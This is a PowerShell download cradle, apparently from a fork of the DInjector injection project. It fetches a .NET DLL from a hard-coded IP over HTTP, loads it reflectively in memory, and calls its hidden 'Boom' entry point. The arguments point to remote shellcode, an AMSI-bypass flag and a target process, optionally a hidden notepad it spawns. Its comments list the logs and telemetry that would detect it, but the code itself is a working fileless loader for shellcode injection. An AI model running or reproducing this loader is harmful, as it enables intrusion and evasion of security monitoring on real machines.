forked from NYAN-x-CAT/DInjector
cradle.ps1
# Download cradle: fetches a .NET assembly over plain HTTP, loads it into the
# current PowerShell process from memory, and reflectively calls a non-public
# static entry point with an argument list built from the settings below.
# The script itself never writes the assembly to disk, so on-disk scanning of
# the DLL has nothing to inspect. Telemetry that does cover it:
#   - PowerShell script block logging (event 4104) records this text, including
#     the hard-coded host and password;
#   - process-creation logging (Sysmon 1 / Security 4688) records the hidden
#     child process started by the Start-Process branch;
#   - proxy / network logs record the unencrypted request for the DLL;
#   - on .NET Framework 4.8+, AMSI is given byte arrays passed to Assembly.Load.

# MODULE: first token of the argument string. The values "remotethread" and
# "remotethreadsuspended" additionally trigger the Start-Process branch below.
$M = "currentthread"
# LHOST: host that serves the DLL and is embedded in the /sc: URL (http://, no TLS).
$H = "10.10.13.37"
# AMSI: passed through as /am51:<value>; what the DLL does with it is not visible here.
$A = "true"
# DLL: resource name requested from http://$H/.
$D = "DInjector.dll"
# SHELLCODE: resource name appended to http://$H/ to form the /sc: argument.
$S = "enc"
# PASSWORD: passed as /password:<value>. Hard-coded in clear text, so it shows
# up verbatim in script block logs and in any copy of this file.
$P = "Passw0rd!"
# PROCESS: process name handed to Start-Process; overwritten with a PID when
# the branch below runs, otherwise passed unchanged as /pid:<name>.
$N = "notepad"
# IMAGE: passed as /image:<path>.
$I = "C:\Windows\System32\svchost.exe"
# --------------------------------------------------------------------
# Module names for which a target process is started before the DLL is called.
$methods = @("remotethread", "remotethreadsuspended")
if ($methods.Contains($M)) {
# Starts $N with a hidden window and replaces $N with the new process id.
# PowerShell spawning a windowless child is a useful parent/child detection.
$N = (Start-Process -WindowStyle Hidden -PassThru $N).Id
}
# Single space-separated argument string; it is split on every space further
# down, so a setting that contains a space ends up as several array elements.
$cmd = "$M /am51:$A /sc:http://$H/$S /password:$P /pid:$N /image:$I"
# IWR is the Invoke-WebRequest alias. The response body is kept in memory only.
# Assumes .Content comes back as byte[] (binary content type) - TODO confirm.
$data = (IWR -UseBasicParsing "http://$H/$D").Content
# Loads the downloaded bytes as an assembly into this PowerShell process.
$assem = [System.Reflection.Assembly]::Load($data)
$flags = [Reflection.BindingFlags] "NonPublic,Static"
# NOTE(review): Assembly.GetType has no BindingFlags overload; presumably
# PowerShell coerces $flags to the Boolean throwOnError parameter - confirm.
$class = $assem.GetType("DInjector.Detonator", $flags)
# Looks up the non-public static method "Boom" on that type.
$entry = $class.GetMethod("Boom", $flags)
# Static call ($null target). The unary comma wraps the string[] from Split in
# a one-element array so it is passed as a single string[] parameter.
$entry.Invoke($null, (, $cmd.Split(" ")))